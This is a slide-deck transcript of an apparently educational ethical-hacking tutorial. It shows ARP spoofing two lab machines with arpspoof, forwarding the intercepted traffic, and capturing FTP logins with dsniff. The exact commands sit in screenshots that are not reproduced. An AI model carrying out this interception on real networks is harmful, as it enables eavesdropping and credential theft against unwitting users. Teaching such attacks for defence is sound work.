man in the middle - hacking illustrated
DESCRIPTION
See how man-in-the-middle is performed. Step by step instructions and diagrams showing how this attack worksTRANSCRIPT
![Page 2: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/2.jpg)
Still one of the most dangerous attacks.
While most security professionals and administrators understand MiTM conceptually, few can actually execute it and prove to the laymen that it is a valid and real threat. In this presentation I’ll give a step by step complete with screenshots on exactly how it’s done.
![Page 3: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/3.jpg)
How does it happen?
• When computers communicate across a network the initiator sends an arp request that asks who has a particular ip address.
• This request is broadcast to everyone on the LAN and depends on the only response coming from the true holder of said IP address.
• The protocol has no built-in functionality to tell if the response comes from the true source.
• Additionally, there’s no rule in the arp protocol that says one has to wait for a request to send a response!
Basically an attack on the arp protocol.
![Page 4: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/4.jpg)
The Setup!
• We’ll be using two servers.• One server will authenticate to another via ftp.• We’ll use Backtrack and arpspoof them both.• The arpspoof makes each victim 1 believe I’m victim 2 and make
victim 2 believe I’m victim 1.• Once we’ve got this in place, I’ll turn on ip forwarding on
Backtrack which allows me to route the packets on to the intended recipient, while still allowing me to “see” the packets.
• We’ll have dsniff running as well to conveniently grab the credentials from the packets.
![Page 5: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/5.jpg)
Communications before attack
Victim 1IP address 192.168.2.128
Victim 2IP address 192.168.2.138
Man in The MiddleIP address 192.168.2.135
Normal traffic flow
![Page 6: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/6.jpg)
Communications after attack
Victim 1IP address 192.168.2.128
Victim 2IP address 192.168.2.138
Man in The MiddleIP address 192.168.2.135
Desired traffic flow
![Page 7: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/7.jpg)
Step 1
Let’s setup Backtrack properly first. There is chance that once
you start it, you didn’t get an ip or your ethernet/or wireless
interface wasn’t enabled. We’ll need to bring the interface
up first. Then we’ll need to have it get an ip address via
dhcp. So let’s do those things.
![Page 8: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/8.jpg)
Backtrack ifconfig command
![Page 9: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/9.jpg)
Eth0 interface is down so let’s bring it up;
![Page 10: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/10.jpg)
After the up command we enter ifconfig again and see that eth0 is now up.
![Page 11: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/11.jpg)
Now we need to tell it to get an ip address via a dhcp request.
The command is /etc/init.d/networking restart
![Page 12: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/12.jpg)
It gets an ip address from your dhcp server. Verify it with ifconfig again. We see we have an ip of 192.168.2.135.
![Page 13: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/13.jpg)
Now we go to our first victim and see that its’ ip is 192.168.2.128.
![Page 14: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/14.jpg)
Victim 2 has an ip address of 192.168.2.138.
![Page 15: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/15.jpg)
Here’s the Filezilla ftp server running on victim 1.
![Page 16: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/16.jpg)
Let’s verify that the two victims can communiate. I’m issuing a continuos ping from victim 2 (.138) to victim 1 (.128).
We’ll let this ping run continously because we’re going to interrupt it with our arpsoof and verify our spoof is working.
![Page 17: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/17.jpg)
Now we go back to our Backtrack and open three terminal shells (you’ll need all three). First arpspoof victim 2 to victim 1. In other words, make victim 1 think you’re victim 2. Now in the second terminal, do the exact opposite. See below.
![Page 18: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/18.jpg)
Once you hit enter on both terminal windows, you’ll see that it’s telling victim 1 that .138 is at the Backtrack mac address, while also telling victim 2 that .128 is at the Backtrack mac address.
![Page 19: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/19.jpg)
We verifty that the spoof is working by seeing if the pings we started earlier on victim 2 are now failing. See below.
![Page 20: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/20.jpg)
We have now successfully diverted both victims traffic to our Backtrack. Now we need to enable ip forwarding so we can now route this traffic to it’s intended destination.
![Page 21: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/21.jpg)
Once we’ve enabled ip forwarding, go back and check your pinging victim 2 and see that the pings are now successful again. Congrats! You’re now man in the middling. But we need to grab credentials. So we’ll need another tool for that.
![Page 22: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/22.jpg)
To grab authentication credentials, we’ll start up dsniff. See below.
![Page 23: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/23.jpg)
Now go to victim 2 and stop your pings. Then ftp to the ftp server running on victim 1.
![Page 24: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/24.jpg)
Next login with whatever credentials you’ve set up on it.
![Page 25: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/25.jpg)
Once you’ve successfully logged in you should see whatever files you have in your ftp store.
![Page 26: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/26.jpg)
Here’s the important part. Dsniff needs to see the entire session to get the credentials. Entire session includes the disconnection or logging off. So you have to end the session before the credentials are actually grabbed. Close your ftp session, then go back to your Backtrack terminal and see the login information. Feeling l33t yet?
![Page 27: Man In The Middle - Hacking Illustrated](https://reader036.vdocuments.site/reader036/viewer/2022062313/5575d599d8b42a917e8b4c90/html5/thumbnails/27.jpg)
Lessons.It is a classic mistake for the laymen and sometimes even security
professionals to think that the answer is always the use of strong passwords. In the case of a man in the middles attack a strong 20 character complex password with numbers, letters, and special characters, is obtained just as easily and quickly as a 5 character letters only password.
Join us in one of our Ethical Hacking classes where I or another of our world class instructors will teach you how to perform man in the middle against encrypted protocols such as SSL.
Thanks for watching! Keatron Evans
Closing
THIS PRESENTATION ALSO AVAILABLE ON Resources.InfosecInstitute.com